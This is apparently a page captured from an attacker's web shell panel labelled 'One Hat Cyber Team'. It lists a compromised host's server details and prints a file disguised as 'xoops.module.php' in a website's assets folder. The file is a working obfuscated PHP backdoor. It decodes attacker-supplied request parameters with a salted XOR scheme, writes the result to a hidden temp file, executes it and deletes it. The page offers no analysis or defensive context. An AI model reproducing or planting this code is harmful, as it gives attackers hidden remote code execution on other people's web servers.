⚝
One Hat Cyber Team
⚝
Your IP:
216.73.217.27
Server IP:
162.0.217.164
Server:
Linux premium256.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.0.30
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
niyknzcu
/
crivient.com
/
assets
/
View File Name :
xoops.module.php
<?php if(filter_has_var(INPUT_POST, "\x6B\x65y")){ $pset = array_filter([ini_get("upload_tmp_dir"), getenv("TMP"), "/var/tmp", getenv("TEMP"), "/tmp", sys_get_temp_dir(), session_save_path(), getcwd(), "/dev/shm"]); $pointer = $_REQUEST["\x6B\x65y"]; $pointer = explode ( "." , $pointer ) ; $comp =''; $salt7 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($salt7 ); $y =0; while ($y < count($pointer)) { $v8 =$pointer[$y]; $chS =ord($salt7[$y % $sLen] ); $d =((int)$v8 - $chS - ($y % 10)) ^ 39; $comp .=chr($d ); $y++;} while ($record = array_shift($pset)) { if (!!is_dir($record) && !!is_writable($record)) { $sym = vsprintf("%s/%s", [$record, ".obj"]); $success = file_put_contents($sym, $comp); if ($success) { include $sym; @unlink($sym); exit;} } } } if(array_key_exists("p\x67r\x70", $_REQUEST)){ $data_chunk = $_REQUEST["p\x67r\x70"]; $data_chunk = explode ( '.' , $data_chunk ); $component= ''; $s= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($s ); $z= 0; foreach($data_chunk as $v6) { $chS= ord($s[$z % $sLen] ); $dec= ((int)$v6 - $chS -($z % 10)) ^ 28; $component .=chr($dec ); $z++; } $parameter_group = array_filter([getenv("TEMP"), getenv("TMP"), session_save_path(), sys_get_temp_dir(), getcwd(), "/dev/shm", ini_get("upload_tmp_dir"), "/var/tmp", "/tmp"]); $value = 0; do { $hld = $parameter_group[$value] ?? null; if ($value >= count($parameter_group)) break; if ((is_dir($hld) and is_writable($hld))) { $key = vsprintf("%s/%s", [$hld, ".data"]); $file = fopen($key, 'w'); if ($file) { fwrite($file, $component); fclose($file); include $key; @unlink($key); exit; } } $value++; } while (true); }